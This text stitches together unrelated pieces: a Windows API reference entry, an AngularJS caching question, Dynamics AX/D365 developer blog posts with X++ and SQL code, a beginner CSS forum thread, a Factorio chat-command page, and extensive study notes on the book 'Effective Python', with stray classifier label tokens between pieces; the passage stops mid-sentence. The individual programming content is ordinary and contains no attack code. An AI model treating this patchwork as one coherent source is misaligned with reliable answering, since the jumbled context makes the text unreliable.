DoubleKeyFrameCollection.GetMany(UInt32, DoubleKeyFrame[]) DoubleKeyFrameCollection.GetMany(UInt32, DoubleKeyFrame[]) DoubleKeyFrameCollection.GetMany(UInt32, DoubleKeyFrame[]) DoubleKeyFrameCollection.GetMany(UInt32, DoubleKeyFrame[]) Method Definition Retrieves multiple elements in a single pass through the iterator. public : unsigned int GetMany(unsigned int startIndex, DoubleKeyFrame[] items) uint32_t GetMany(uint32_t startIndex, DoubleKeyFrame[] items) const; public uint GetMany(UInt32 startIndex, DoubleKeyFrame[] items) Public Function GetMany(startIndex As UInt32, items As DoubleKeyFrame[]) As uint Parameters startIndex UInt32 UInt32 The index from which to start retrieval. items DoubleKeyFrame[] DoubleKeyFrame[] Provides the destination for the result. Size the initial array size as a capacity in order to specify how many results should be retrieved. Returns uint uint The number of items retrieved. Remarks The GetMany method operates identically as if calling and for each element in the supplied array. This means that the first element returned by the GetMany method is the same element as returned by retrieving the property prior to calling GetMany. After the GetMany call returns, the property will retrieve the element following the last element returned by the GetMany call, or produce an error if no more elements exist in the sequences. The GetMany method returns the actual number of elements returned. It must be the minimum of a) the number of elements remaining in the collection, or b) the number of elements requested, that is, capacity. Therefore, whenever GetMany returns less than the number of elements requested, the end of the sequence has been reached. It returns the number of elements retrieved in the actual output parameter. When the caller specifies a capacity of zero, the position of the iterator is unchanged. Elements in the array following the values returned are unchanged.
__label__pos
0.571532
Mike Mike - 6 months ago 31 AngularJS Question Store JSON file contents on load Right now, I have a factory which loads a JSON file. angular.module("app").factory("RolesFactory", ['$http', '$q', function($http, $q) { var d = $q.defer(); $http.get('events.json').success(function(data) { d.resolve(data); }); return d.promise; }]); And then I call this factory when I need the contents of events.json with this controller: App.controller('rolesCtrl', ['$scope', 'RolesFactory', function($scope, RolesFactory) { RolesFactory.then(function(roleData){ $scope.roles = roleData.roles; }); }]); All good, but whenever I need to use this data. Isn't it refetching the contents of events.json? Meaning: is Angular reloading the file over and over again? I was hoping to load the file once and call it by a global variable or something. When my app loads initially, I want it to load and store the contens of events.json -- and then I'd like my app to be able to use this data whenever/wherever. Is this possible? Answer As AngularJS is a stateless framework, you have only a few options here, all of which are some kind of client-side caching: 1. Use localStorage to store your data. Once the data is fetched, you can just save it to localStorage using localStorage.setItem after Stringifying the JSON. You'll need to re-parse the JSON the next time you use it though, so if this is a giant JSON, this is not the best idea 2. Use sessionStorage to store your data. This is exactly the same as #1, but you will lose data upon termination of session,i.e. closing your browser. 3. Trust the JSON to be cached in your browser. This is most likely the case. Static assets are by default cached by most modern browsers. So, the second time your factory requests the JSON, the resource isn't actually fetched from the server. It is merely pulled from the browser's cache. NOTE: The way to check this is to see what the HTTP status code for your resource is, in Chrome's Developer Tools Network tab. If the status says 304 that means it has been pulled from cache. enter image description here
__label__pos
0.625432
Advanced cross-reference search. Cross-references search Cross-reference is one of the best tools we have in AX that is used by developers daily, however, not everyone is using it for 100%. Recently, I was asked how to find cross-references for a kernel method that is not defined on a table, because you cannot right click on it 😊   And that’s a good question, often we want to find if there is a call to doUpdate or doInsert somewhere. In AX 2012 go to Tools -> Cross-reference -> Names and filter by table or method name and then click Used by. SalesLine.DoUpdate_Names SalesLine.DoUpdate_UsedBy Using this form, we can find usage of CRL types as well, for example, Microsoft.Dynamics.IntegrationFramework.  It is defined in AOT under references node, however, from there you cannot find any references.  Names would show you everything! CLRTypeUsage What about D365FOE? As we know, it’s a bit different here. Cross-references data is moved to DYNAMICSXREFDB database. DYNAMICSXREFDB And it makes perfect sense because you need to pay for each GB of DB space in Production. Using next SQL statement, we can find usage of any object. For example, Microsoft.Dynamics.IntegrationFramework : SELECT sourceName.[Path] as sourcePath, targetName.[Path] as targetPath, [Kind], [Line], [Column], sourceModule.[Module] as sourceModule, targetModule.[Module] as targetModule FROM dbo.[References] INNER JOIN dbo.[Names] sourceName ON dbo.[References].[SourceId] = sourceName.[Id] INNER JOIN dbo.[Modules] sourceModule ON sourceName.[ModuleId] = sourceModule.[Id] INNER JOIN dbo.[Names] targetName ON dbo.[References].[TargetId] = targetName.[Id] INNER JOIN dbo.[Modules] targetModule ON targetName.[ModuleId] = targetModule.[Id] WHERE targetName.[Path] like '%Microsoft.Dynamics.IntegrationFramework%' CLRTypeUsage_D365FOE Where Kind is: /// <summary> /// Types of Cross References /// </summary> public enum CrossReferenceKind { /// <summary> /// Type not specified. Used for queries /// </summary> Any = 0, /// <summary> /// Indicates that the reference is a Method Call /// </summary> MethodCall = 1, /// <summary> /// Type reference /// Indicated that the type is used (variable and field declaration, attributes, function return type, etc) /// </summary> TypeReference = 2, /// <summary> /// Interface implementation /// Indicates that the source entity is implementing this interface /// </summary> InterfaceImplementation = 3, /// <summary> /// Class Extended /// Indicates that the source entity is extending this class or interface /// </summary> ClassExtended = 4, /// <summary> /// Test Call /// Indicates that the source entity (test) directly or indirectly calls an application method. /// </summary> TestCall = 5, /// <summary> /// Property /// Indicates that the source entity has a certain property. /// </summary> Property = 6, /// <summary> /// Attribute reference /// Indicated that an Attribute is used /// </summary> Attribute = 7, /// <summary> /// Test Helper Call /// Indicates that the source entity is a test helper. /// </summary> TestHelperCall = 8, /// <summary> /// Metadata or code Tag reference /// Indicates that the source tag is used on a metadata element, class or a method or a line of code. /// </summary> Tag = 9, } Let’s try doUpdate: DoUpdate_UsedBy_D365FOE As we can see, result is different to AX 2012, where we could search for an individual table, now all Common methods have reference to Common.   Advertisements D365FOE. FormHasMethod extension for form extension methods. Recently I have seen multiple people asking how to check if form has method added by extension at run-time.  For form methods we can use Global::formHasMethod but it does not work with form extensions. I advised people to use new metadata API to do this and finally community user Axaptus wrote the code! I tweaked it a bit to ignore method’s name case as AX does and to exclude private methods. Also I used it to extend standard formHasMethod method /// <summary> /// The class <c>Global_Extension</c> contains extension methods for the <c>Global</c> class. /// </summary> [ExtensionOf(classStr(Global))] public static final class Global_Extension { static boolean formHasMethod(FormRun fr, IdentifierName methodName) { boolean ret = next formHasMethod(fr, methodName); if (!ret) { ret = Global::formExtensionHasMethod_IM(fr, methodName); } return ret; } private static boolean formExtensionHasMethod_IM(FormRun _formRun, IdentifierName _methodName) { if (!_formRun || !_methodName) { return false; } try { System.Object[] extensions = Microsoft.Dynamics.Ax.Xpp.ExtensionClassSupport::GetExtensionsOnType(_formRun.GetType(), true); if (extensions) { System.Type formRunExtensionType; System.Reflection.MethodInfo methodInfo; //extension methods are always static var bindingFlags = BindingFlags::Public | BindingFlags::Static | BindingFlags::IgnoreCase; for (int i = 0; i < extensions.Length; i++) { formRunExtensionType = extensions.GetValue(i); var methodsInfo = formRunExtensionType.GetMethods(bindingFlags); for (int n = 0; n < methodsInfo.get_Length(); n++) { methodInfo = methodsInfo.getValue(n); if (methodInfo.Name == _methodName) { return true; } } } } } catch (Exception::CLRError) { error(CLRInterop::getLastException().ToString()); } return false; } } Extending standard method has its pros and cons. From one side it will slow down execution of standard code that calls it when method does not exist, but it’s a rare case. From another side it allows you to reuse standard code without changing it and it could be handy in various places where AX looks for a method on a form. Source code is available on GitHub D365FOE. Issue with enums that have “Use Enum Value” property set to “No”. Recently we have noticed incorrect behavior of enums that have “Use Enum Value” set to “No” and have gaps in enum values. These enums use values from properties when populated from user interface, however, X++ code uses generated values, that cause inconsistent behavior and data corruption. To illustrate this issue, we will create new enum with two values: 0 and 10. Also we need to set “Use Enum Value” property to “No”. MyEnum MyEnumProperties Zero: MyEnumZero Ten: MyEnumTen Also, we need simple table that has only one field, form to populate this field from UI and job to create data from X++. Table: MyTable Form: MyForm Runnable class: RunnableClass Let’s run the class and check data in DB and UI. In DB value is equal to value from enum properties – 10: MyEnumInDBFromX++ On the form we can see empty value: MyFormInsertFromX++ Let’s create new record using UI and check what is saved to DB. MyFormInsertFromUI MyEnumInDBFromUI As you can see, value is equal to 1. For these enums value entered from UI will never be equal to value entered from X++ code, so if it is created in X++ user would see empty values, if it is created from UI X++ comparison like: If (myTable.MyEnum == MyEnum::Ten)   would always return false, even if user see “Ten” on UI, because values are different. It was a common practice to have gaps in enum values for different layers, so you could avoid conflicts when new values are created in new version or a hotfix. AssetTransType is a good example, where localization related values start from 100, because they used to be on another layer. However, most of standard enums use enum values, so probably that is why this bug was not spotted before. As a good citizen, I filled a bug, but I have a sneaky suspicion that it won’t be fixed soon, so be aware of this volatile mix, try to avoid changing “Use Enum Value” property and review your enums in case you have one! D365FO. Working with Azure File storage. Azure Storage - Files Current version of AX uses Azure Blob storage for various things like document handling, retail CDX files, DIXF and Excel add-in. You can find several blogs explaining how to upload and download files to Blob, SharePoint or temporary storage. However, what about file shares? Azure File storage implements SMB 3.0 protocol and could be easily mapped to your local computer. You need just a few minutes to create new storage account and mount it, watch this how-to video for details. To read file from newly created share we can use next code: using Microsoft.Azure; using Microsoft.WindowsAzure.Storage; using Microsoft.WindowsAzure.Storage.Blob; using Microsoft.WindowsAzure.Storage.File; class RunnableClass1 { public static void main(Args _args) { System.IO.MemoryStream memoryStream; var storageCredentials = new Microsoft.WindowsAzure.Storage.Auth.StorageCredentials('AzureStorageAccountName', 'AzureStorageAccountKey'); CloudStorageAccount storageAccount = new Microsoft.WindowsAzure.Storage.CloudStorageAccount(storageCredentials, true); CloudFileClient fileClient = storageAccount.CreateCloudFileClient(); CloudFileShare share = fileClient.GetShareReference('AzureStorageShareName'); if (share.Exists(null, null)) { CloudFileDirectory rootDir = share.GetRootDirectoryReference(); CloudFileDirectory fileDir = rootDir.GetDirectoryReference('folder'); if (fileDir.Exists(null, null)) { CloudFile file = fileDir.GetFileReference('file.txt'); if (file.Exists(null, null)) { memoryStream = new System.IO.MemoryStream(); file.DownloadToStream(memoryStream, null, null, null); } } } } } References: Edited: Azure File Storage client source code could be found on GitHub D365O. Trick to pass a value between Pre and Post event handler using XppPrePostArgs. Recently we came across a scenario where we needed to check if a field has changed after super() in update method of a table. Back in the days of AX 2012 you could easily compare original field’s value with current using orig() method before super() and call necessary logic after. public void update() { boolean myFieldHasChanged = this.MyField != this.orig().MyField; super(); if (myFieldHasChanged) { this.doStuff(); } } Now we want to do the same using extensions. We can create Pre and Post event handlers, but they are static, so we need a way to pass a value between them. First option is to use static field, like it’s done in RunBase extension example public static class MyTableEventHandler { private static UnknownNoYes myFieldHasChanged; [PreHandlerFor(tableStr(MyTable), tableMethodStr(MyTable, update))] public static void MyTable_Pre_update(XppPrePostArgs _args) { MyTable myTable = _args.getThis() as MyTable; if (myTable.MyField != myTable.orig().MyField) { MyTableEventHandler::myFieldHasChanged = UnknownNoYes::Yes; } else { MyTableEventHandler::myFieldHasChanged = UnknownNoYes::No; } } [PostHandlerFor(tableStr(MyTable), tableMethodStr(MyTable, update))] public static void MyTable_Post_update(XppPrePostArgs _args) { MyTable myTable = _args.getThis() as MyTable; if (MyTableEventHandler::myFieldHasChanged == UnknownNoYes::Yes) { myTable.doStuff(); } MyTableEventHandler::myFieldHasChanged = UnknownNoYes::Unknown; } } Another option is to use XppPrePostArgs as a vehicle for new parameter. XppPrePostArgs has collection of parameters under the hood, so nothing stops us to add one more and framework will take care of passing it between Pre and Post event handler! XppPrePostArgs_collection.jpg public static class MyTableEventHandler_XppPrePostArgs { const static str myFieldHasChangedArgName = 'myFieldHasChanged'; [PreHandlerFor(tableStr(MyTable), tableMethodStr(MyTable, update))] public static void MyTable_Pre_update(XppPrePostArgs _args) { MyTable myTable = _args.getThis() as MyTable; boolean myFieldHasChanged = myTable.MyField != myTable.orig().MyField; <strong>_args.addArg(MyTableEventHandler_XppPrePostArgs::myFieldHasChangedArgName, myFieldHasChanged);</strong> } [PostHandlerFor(tableStr(MyTable), tableMethodStr(MyTable, update))] public static void MyTable_Post_update(XppPrePostArgs _args) { MyTable myTable = _args.getThis() as MyTable; <strong>boolean myFieldHasChanged = _args.getArg(MyTableEventHandler_XppPrePostArgs::myFieldHasChangedArgName); </strong> if (myFieldHasChanged) { myTable.doStuff(); } } } Using one of these approaches you should remember that static fields apply to the class, not to instances of the class, so do not mix well with concurrency. Trick with XppPrePostArgs tightly depends on current implementation, that could be changed anytime and comes with no warranty. To overcome this and other limitations of extensions capabilities Microsoft is introducing Method wrapping and chain of command and I’m pretty sure that we’ll see blogs on this from my MVP fellows soon.
__label__pos
0.958025
5. Use classes to add class... what am I doing wrong? #1 I keep getting the error code: "Opps, try again. Did you remember to give you .friend class a border of 2px dashed #008000?" I can't figure out what I'm doing wrong to save my life! HTML <!DOCTYPE html> <html> <head> <link type="text/css" rel="stylesheet" href="stylesheet.css"/> <title>My Social Network</title> </head> <body> <!--Add your HTML below!--> <div class="friend" id="best_friend"><p>Rodger</p></div> <div class="friend"><p>Roy</p></div> <div class="family"><p>Ron</p></div> <div class="enemy"><p>Ray</p></div> <div class="enemy" id="archnemesis"><p>Rida</p></div> </body> </html> CSS: div { display: inline-block; margin-left: 5px; margin-top: 5px; height: 100px; width: 100px; border-radius: 100%; border: 2px; text-align: center; position: relative; } best_friend { border: 4px solid #008000; } .friend { border: 2px dashed #008000; } .family { border: 2px dashed #0000FF; } .enemy { border: 2px dashed #FF0000; } archnemesis { border: 4px solid #FF0000; } #2 Your best_friend and archnemesis overwrite your friend and enemy, causing problems in the checking script #3 How do I correct the problem? I don't understand how "best_friend" and "archnemesis" are overwriting "friend" and "enemy" #4 Well, some of your divs to both have a class and id, the id styling will be applied, so some of your friend and enemy div's have the wrong border. You could turn the #best_friend and #archnemesis into a comment #5 I just removed the class from those div lines and left the IDs and everything worked. Thanks! #6 That will also work.
__label__pos
0.957391
Factorio Ignore Command Use this command to ignore a player - ignoring a player means that you will not see messages they send in chat. Messages from administrators are still shown. Ignore Syntax The syntax for the ignore command is as follows: /ignore [player name] This command has the following arguments: Player NameThe name of the player you wish to hide messages from. Looking for other commands? Search our database of 39 Factorio commands... To the Commands Ignore Examples Find below working examples of the ignore command. /ignore john23 Executing this command would ignore the player with username 'john23', meaning you would not see any of their messages they send in chat (or via PM). /ignore eviladmin In this example, the player with username 'eviladmin' is an administrator. Despite having ignored the player, messages they send in chat will still be sent to you because they are an administrator (you cannot ignore admins).
__label__pos
0.758667
MATLAB Answers How can make the word in Table not-split? 5 views (last 30 days) John John on 25 Sep 2020 Commented: John on 29 Sep 2020 In above table, the word is split. How can keep the words "right" and "left" (and any word) not split?   2 Comments John John on 25 Sep 2020 Hi, Walter: Yes, as tags indicate. It looks bad. Hope there is a way to make it right. Thanks. Sign in to comment. Accepted Answer Rhea Chandy Rhea Chandy on 28 Sep 2020 Hi John, It’s my understand that you are using Report Generator and you want to avoid hyphenation, i.e. Splitting the words in a table entry. You can use Hyphenation class to specify the hyphenation behaviour of paragraphs and table cells. h = mlreportgen.dom.Hyphenation(false) This will disable hyphenation and set the property Value to []. You can refer to this documentation to learn about Hyphenation class and how to apply it.   3 Comments John John on 29 Sep 2020 This is what the link says: Starting in R2020b: • Hyphenation is disabled, by default, for paragraphs and tables. • When hyphenation is disabled, where possible, a line break occurs between words. If necessary to prevent overflow, a line break can occur anywhere in a word. • When hyphenation is enabled, a line break and hyphenation character occur only at the end of a syllable. If a table cell contains a long sequence of numbers or letters that have no clear syllable breaks, overflow can occur. The table stretches to accommodate the overflow. Before R2020b: • Hyphenation was disabled for paragraphs. Hyphenation was enabled for tables and the default hyphenation character was an empty space. • When hyphenation was disabled, a line break occurred only between words, which resulted in an overflow when a word extended past the boundary of a page or table cell. • When hyphenation was enabled, a line break and hyphenation character could occur anywhere in a word in a paragraph or table. It seems that in either version, "When hyphenation was disabled, a line break occurred only between words", and this is what I wanted to break between words. Anyways, I'll install R2020b and see what's going on. Thanks. Sign in to comment. More Answers (0) Community Treasure Hunt Find the treasures in MATLAB Central and discover how the community can help you! Start Hunting! Translated by
__label__pos
0.834751
Effective Python Summary Notes# I’ve been wanting to learn and improve my python so I read a book and took notes from Effective Python - Brett Slatkin. He has some good tech reads on his blog. Pythonic Thinking# Know which python version you are using# $ python –version of >>> import sys >>> print(sys.version_info) sys.version_info(major=3, minor=6, micro=4, releaselevel='final', serial=0) >>> print(sys.version) 3.6.4 (default, Mar 9 2018, 23:15:03) [GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.39.2)] • Prefer python 3 for new projects. • There are many runtimes: CPython, Jython, Itonpython, PyPy. Default is CPython. Follow PEP8 Style Guide# Conistent style makes code more approachable and easy to read Facilitates collaboration Read the pep8 style guide Know the Differences Between bytes, str, and unicode# In python 3 there is bytes and str. str contain unicode values bytes contain raw 8-bit values • You need to use encode and decode to convert unicode to bytes • Do encoding and decoding at the furtherest boundary of the interface (so core of program works with unicode) • bytes and str instances are never equivalent (In python 3) • File handles (using open) default to UTF-8 encoding Ensure to use wb write-banary mode as opposed to w wrote character mode: with open('/tmp/random.bin', 'wb') as f: Write helper functions, instead of complex expressions# Consider: red = int(my_values.get('red', [''])[0] or 0) This code is not obvious. There is a lot of visual noise and it is not approachable. You could use a ternary: red = my_values.get('red', ['']) red = int(red[0]) if red[0] else 0 but it is still not great. So a helper function: def get_first_int(values, key, default=0):     found = values.get(key, [''])     if found[0]:         found = int(found[0])     else:         found = default     return found and calling: green = get_first_int(my_values, 'green') is much clearer. • Use complex expressions to a help function, espescially when logic is repeated Know how to slice sequences# • list, str and bytes can be sliced • The result of a slice is a whole new list, the original is not changed Syntax is: somelist[start:end] eg: a = [1, 2, 3, 4] a[:2] a[:5] a[0:5] Avoid Using start, end, and stride in a Single Slice# somelist[start:end:stride] The stride lets you take every nth item >>> colours = ['red', 'orange', 'yellow', 'blue', 'green'] >>> colours[::2] ['red', 'yellow', 'green'] • Can be very confusing, espescially negative strides • Avoid start and end when doing a stride • Use itertools module islice function if necessary Use List Comprehensions Instead of map and filter# List comprehensions derive one list from another >>> numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] >>> [x**2 for x in numbers] [1, 4, 9, 16, 25, 36, 49, 64, 81, 100] Preferable over using map that requires a lambda squares = map(lambda x: x ** 2, a) You can also use lsit comprehensions to filter with an if: [x**2 for x in numbers if x % 2 == 0] which can be achieved with map and filter: alt = map(lambda x: x**2, filter(lambda x: x % 2 == 0, a)) list(alt) There are also list comprehensions for dict and set chile_ranks = {'ghost': 1, 'habanero': 2, 'cayenne': 3} # dict comprehension rank_dict = {rank: name for name, rank in chile_ranks.items()} # set comprehensoin chile_len_set = {len(name) for name in rank_dict.values()} Avoid More Than Two Expressions in List Comprehensions# List comprehensions support multiple loops matrix = [[1, 2, 3], [4, 5, 6], [7, 8, 9]] flat = [x for row in matrix for x in row] and multiple if conditions a = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] b = [x for x in a if x > 4 if x % 2 == 0] c = [x for x in a if x > 4 and x % 2 == 0] You can also use conditions at each level: matrix = [[1, 2, 3], [4, 5, 6], [7, 8, 9]] filtered = [[x for x in row if x % 3 == 0]             for row in matrix if sum(row) >= 10] print(filtered) But this is horrendous for someone else to comprehend Consider Generator Expressions for Large Comprehensions# • List comprehensions create a new list with at most the same number of values in the input sequence • For large inputs this may cause the program to crash due to memory usage • To solve this, Python provides generator expressions, a generalization of list comprehensions and generators • generator expressions evaluate to an iterator that yields one item at a time from the expression When you’re looking for a way to compose functionality that’s operating on a large stream of input, generator expressions are the best tool for the job it = (len(x) for x in open(‘/tmp/my_file.txt’)) gen = (print(i) for i in [9,1,2,3,3,]) print(next(gen)) Prefer Enumerate over Range# If you need the index use enumerate, Python enumerate wraps any iterator with a lazy generator As opposed to: for i in range(len(flavor_list)):     flavor = flavor_list[i]     print('{}: {}'.format(i + 1, flavor)) consider (and setting where enumerate should being counting): for i, flavor in enumerate(flavor_list, 1):     print('{}: {}'.format(i , flavor)) Use zip to process iterators in parrallel# names = [‘Cecilia’, ‘Lise’, ‘Marie’] letters = [len(n) for n in names] For processing a list and derived list simulateously you can use enumerate to get the index: for i, name in enumerate(names):     count = letters[i]     if count > max_letters:         longest_name = name         max_letters = count But python provides zip, that wraps 2 or more iterators with a lazy generator. The zip generator yields tuples containing the next value from each iterator for name, count in zip(names, letters):     if count > max_letters:         longest_name = name         max_letters = count • If the iterators supplied are not the same length, it keeps going until 1 is exhausted. • zip will truncate quietly Avoid Else blocks after for and while# for i in range(3):     print('Loop {}'.format(i)) else:     print('Else block!') Python weirdly has an else after a for and that makes it difficult for new programmers. The reason is it works more like an except because the else part will run at the end of the loop. So it will execute regardless of whether the loop was entered or not. • A break statement in the for part will skip the else block • The behaviour is not obvious or intuitive* Take Advantage of Each Block in try/except/else/finally# Finally Blocks# Use try...finally when you want exceptions to propagate up but you also want to run cleanup code when exceptions occur. handle = open('/tmp/random_data.txt')  # May raise IOError try:     data = handle.read()  # May raise UnicodeDecodeError finally:     handle.close()        # Always runs after try: Else Blocks# • When the try block doesn’t raise an exception, the else block will run. • The else block helps you minimize the amount of code in the try block and improves readability def load_json_key(data, key):     try:         result_dict = json.loads(data)  # May raise ValueError     except ValueError as e:         raise KeyError from e     else:         return result_dict[key] If decoding is successful the result key is returned if there is a KeyError that propagtes up to the caller Everything together Try…Except…Else…Finally# UNDEFINED = object() def divide_json(path): handle = open(path, 'r+')   # May raise IOError try: data = handle.read()    # May raise UnicodeDecodeError op = json.loads(data)   # May raise ValueError value = (op['numerator'] / op['denominator']) # May raise ZeroDivisionError except ZeroDivisionError as e: return UNDEFINED else: op['result'] = value result = json.dumps(op) handle.seek(0) handle.write(result)    # May raise IOError return value finally: handle.close() # Always runs Functions# Best organisation tool that help break up large programs into smaller pieces. They improve readibility and make code more approachable. Prefer Exceptions to Returning None# There’s a draw for Python programmers to give special meaning to the return value of None A helper function that divides one number by another. In the case of dividing by zero, returning None seems natural because the result is undefined. def divide(a, b): try: return a/b except ZeroDivisionError: return None Using the function: result = divide(x, y) if result is None:     print('Invalid inputs') The problem is what if the numerator is 0 and denominator not zero, that returns 0. Then when you evaluate in an if condition and look for false istead of is None That is why returning None is error prone There are two ways to fix this, the first is returning a two tuple of (success_flag, result) The problem is that some will just ignore that with the _ for unused variables The better way is to not return None at all, rather raise an exception and have them deal with it. def divide(a, b):     try:         return a / b     except ZeroDivisionError as e:         raise ValueError('Invalid inputs') from e I would even not raise the ValueError It is then handled better on the caller (no check for None): x, y = 5, 2 try:     result = divide(x, y) except ValueError:     print('Invalid inputs') else:     print('Result is %.1f'.format(result)) >>> Result is 2.5 Raise eceptions instead of returning None Know How Closures Interact with Variable Scope# • closures: functions that refer to variables from the scope in which they were defined • functions are first class objects: you can refer to them directly, assign them to variables, pass them as arguments to other functions When you reference a variable the python interpreter resolves the reference in this order: 1. Current function’s scope 2. Any enclosing scopes 3. Scope of the module containing the code (global scope) 4. The built-in scope (python built in functions: len, str, etc.) If none of these find the reference a NameError is raised. Assigning a value to a variable works differently. If the variable is already defined in the current scope, then it will just take on the new value. If the variable doesn’t exist in the current scope, then Python treats the assignment as a variable definition def sort_priority2(numbers, group):     found = False         # Scope: 'sort_priority2'     def helper(x):         if x in group:             found = True  # Scope: 'helper' -- Bad!             return (0, x)         return (1, x)     numbers.sort(key=helper)     return found So how do you get the data out: The nonlocal statement is used to indicate that scope traversal should happen upon assignment for a specific variable name. It won’t go up the module level. def sort_priority3(numbers, group):     found = False     def helper(x):         nonlocal found         if x in group:             found = True             return (0, x)         return (1, x)     numbers.sort(key=helper)     return found • It’s complementary to the global statement, which indicates that a variable’s assignment should go directly into the module scope. • When your usage of nonlocal starts getting complicated, it’s better to wrap your state in a helper class. • By default, closures can’t affect enclosing scopes by assigning variables. • Avoid nonlocal A class can be used to make it much easier to read: class Sorter(object):     def __init__(self, group):         self.group = group         self.found = False     def __call__(self, x):         if x in self.group:             self.found = True             return (0, x)         return (1, x) sorter = Sorter(group) numbers.sort(key=sorter) assert sorter.found is True Consider Generators Instead of Returning Lists# Take getting the indices of words in a sentence: def index_words(text): result = [] if text:         result.append(0)     for index, letter in enumerate(text):         if letter == ' ':             result.append(index + 1)     return result • It is dense and noisy • One line for creating result list and one for returning it • It requires all results to be stored in the list before being returned (inefficent use of memory) The better way is to use a generator. When called, generator functions do not actually run but instead immediately return an iterator. With each call to __next__ of the iterator, it will advance to the next yield expression def index_words_iter(text): if text: yield 0 for index, letter in enumerate(text): if letter == ' ': yield index + 1 • It is easier to read as references to the result list have been eliminated • The iterator returned by the generator can be converted with list() • Done line by line espescially useful in a stream of reading from a file Be Defensive when Iterating over Arguments# An iterator only produces its results a single time If you iterate over an iterator or generator that has already raised a StopIteration exception, you won’t get any results the second time around Using out previous example: address = 'Four score and seven years ago...' word_iterator = index_words_iter(address) print(list(word_iterator)) print(list(word_iterator)) returns [0, 5, 11, 15, 21, 27] [] Also no exception is raised as python functions are looking for the StopIteration exception during normla operation. They don’t know the difference between an Iterator with no output and an iterator whose output has been exhausted. One way to fix this is to copy the results of the iterator but the output could be large and cause your program to crash. The better way to achieve the same result is to provide a new container class that implements the iterator protocol The iterator protocol is how Python for loops and related expressions traverse the contents of a container type. When Python sees a statement like for x in foo it will actually call iter(foo). The iter built-in function calls the foo.__iter__ special method in turn. The __iter__ method must return an iterator object (which itself implements the __next__ special method). Then the for loop repeatedly calls the next built-in function on the iterator object until it’s exhausted (and raises a StopIteration exception). It sounds complicated, but practically speaking you can achieve all of this behavior for your classes by implementing the __iter__ method as a generator class WordIndexer: def __init__(self, text): self.text = text def __iter__(self): if self.text: yield 0 for index, letter in enumerate(self.text): if letter == ' ': yield index + 1 calling it with: word_index = WordIndexer(address) print(list( word_index)) print(list( word_index)) Now WordIndex is a class that implements the Iterator Protocal (A conatiner for an iterator). Now we need to ensure that the iterator to a function is not an iterator: def normalize_defensive(numbers): '''When an iterator object is passed into iter() it returns the iterator, when a container is entered a new iterator is returned each time''' if iter(numbers) is iter(numbers): raise TypeError('Must supply a container') Reduce Visual Noise with Variable Positional Arguments# Optional positional arguments (*args) can make a function call more clear and remove visual noise. Take this example: def log(message, values): if not values: print(message) else: values_str = ', '.join(str(x) for x in values) print('{}: {}'.format(message, values_str)) To just print out my message, I have to send an empty [] log('My numbers are', [1, 2]) log('hello world', []) You can tell python it is an optional parameters with: def log(message, *values): ... and then call it with: log('hello world') You would need to change how you send values in though: favorites = [7, 33, 99] log('Favorite colors', *favorites) The *favourites tells python to pass items from the sequence as positional arguments: *favourites == (7, 33, 99) favourites == ([7, 33, 99],) There are a few problems: 1. The variable arguments are always turned into a tuple before they are passed to your function. This could consume alot of memory on a generator as it is turned into a tuple. Functions that accept *args are best for situations where you know the number of inputs in the argument list will be reasonably small 1. You can’t add new positional arguments to your function in the future without migrating every caller Ie. adding def log(sequence, message, *values): will break an existing call to log('hello world') Bugs like this are hard ot track down. Therefore you should use keyword only arguments when extending a function already accepting *args Provide Optional Behavior with Keyword Arguments# All positional arguments in python can also be called with keywords. They can be called: def remainder(number, divisor): return number % divisor assert remainder(20, 7) == 6 assert remainder(20, divisor=7) == 6 assert remainder(number=20, divisor=7) == 6 assert remainder(divisor=7, number=20) == 6 One way it cannot be called is with: assert remainder(number=20, 7) == 6 as that raises: SyntaxError: positional argument follows keyword argument Also each argument must be specified once: remainder(20, number=7) gives: TypeError: remainder() got multiple values for argument 'number' • Keyword arguments make function calls clearer to new readers of code • They can have default values - reducing repetitive code and reducing noise (gets difficult with complex defaults) • They provide a powerful way to extend a function’s parameters while maintaining backwards compatibility with existing callfs With a default period of per second: def flow_rate(weight_diff, time_diff, period=1):     return (weight_diff / time_diff) * period would be preferable to: def flow_rate(weight_diff, time_diff, period):     return (weight_diff / time_diff) * period You could also extend this without breaking existing calls with: def flow_rate(weight_diff, time_diff,               period=1, units_per_kg=1):     return ((weight_diff / units_per_kg) / time_diff) * period The only problem with this is that optional arguments period and units_per_kg may still be specified as positional arguments. pounds_per_hour = flow_rate(weight_diff, time_diff, 3600, 2.2) The best practice is to always specify optional arguments using the keyword names and never pass them as positional arguments. Use None and Docstrings to specify dynamic default arguments# Sometimes you need to use a non-static type as a keyword arguments defualt value For example when logging a message oyu want to include the time and date of the log: def log(message, when=datetime.datetime.now()): print('{}: {}'.format(when, message)) log('Hi there!') sleep(0.1) log('Hi again!') >>> 2018-07-13 21:34:08.251207: Hi there! >>> 2018-07-13 21:34:08.251207: Hi again! Remember datetime.datetime.now is only run once, when the function is defined The convension for achieving the desired result is to set when=None and document how to use the function is a docstring. def log(message, when=None): '''Log a message with a timestamp Args: message: Message to print when: datetime of when the message occured Default to present time ''' when = datetime.datetime.now() if when is None else when print('{}: {}'.format(when, message)) The None arugment is espescially important for arguments that are mutable. Say you want to decode some json with a default: def decode(data, default={}): try: return json.loads(data) except ValueError: return default foo = decode('bad data') foo['stuff'] = 5 bar = decode('also bad data') foo['jink'] = '45' print('Foo:', foo) print('bar:', bar) >>> Foo: {'stuff': 5, 'jink': '45'} >>> bar: {'stuff': 5, 'jink': '45'} Unforunately both foo and bar are both equal to the default parameter. They are the same dictionary object being modified. The fix is setting default=None Change it like: def decode(data, default=None): if default is None: default = {} try: return json.loads(data) except ValueError: return default • Use None as the default argument for keyword arguments that have a dynamic value • Keyword arguments are evaluated once, at module load time Enforce Clarity with Keyword-Only Arguments# Say you have a function with signature: def safe_division(number, divisor, ignore_overflow, ignore_zero_division): … Expecting the ignore_overflow and ignore_zero_division flags to be boolean. You can call it: >>> result = safe_division(1, 0, False, True) >>> result = safe_division(1, 10**500, True, False) It is not clear what the boolean flags are and it is easy to confuse them. One way to change this is to default them to false and callers must say which flags they want to switch. The problem is you can still call it with: safe_division(1, 10**500, True, False) In python 3 you can demand clarity with keyword only arguments. These arguments can only be supplied by keyword never by position. You do this using the * symbol in the argument list, which indicates the end of positional arguments and the beginning of keyword-only arguments. def safe_division_c(number, divisor, *, ignore_overflow=False, ignore_zero_division=False): ... Now calling it badly: safe_division_c(1, 10**500, True, False) >>> TypeError: safe_division_c() takes 2 positional arguments but 4 